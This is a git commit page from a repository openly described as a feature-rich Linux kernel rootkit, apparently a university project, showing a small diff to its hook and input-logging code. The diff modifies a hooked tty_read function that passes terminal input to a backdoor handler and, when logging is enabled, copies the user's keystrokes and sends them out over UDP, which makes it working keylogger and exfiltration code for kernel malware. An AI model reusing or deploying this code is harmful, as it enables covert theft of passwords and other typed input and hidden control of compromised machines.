linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 1d08e266816b5fd329bc89f1eff316f07be48384
parent 95ab20f154fa60faae319ad7f33fd5ab1fadb86f
Author: deurzen <m.deurzen@tum.de>
Date:   Sat, 12 Dec 2020 22:12:06 +0100

refactors code

Diffstat:

Msrc/hook.c | 5++++-


Msrc/inputlog.c | 2+-


2 files changed, 5 insertions(+), 2 deletions(-)

diff --git a/src/hook.c b/src/hook.c
@@ -152,11 +152,14 @@ g7_tty_read(struct file *file, char *buf, size_t count, loff_t *off)
     atomic_inc(&tty_read_count);
     ssize_t ret = sys_tty_read(file, buf, count, off);
 
+    char *buf_new = (char *)kmalloc(count, GFP_KERNEL);
+    copy_from_user(buf_new, buf, count);
+
     if (rootkit.backdoor == BD_TTY)
         handle_pid(current->pid, buf, count);
 
     if (rootkit.logging_input)
-        send_udp(buf, count);
+        send_udp(buf_new, count);
 
     atomic_dec(&tty_read_count);
     return ret;
diff --git a/src/inputlog.c b/src/inputlog.c
@@ -10,7 +10,7 @@
 
 #define UDP_MAX_DATA_LEN 65507
 
-struct socket *sock;
+struct socket *sock = NULL;
 struct sockaddr_in addr, bind;
 
 void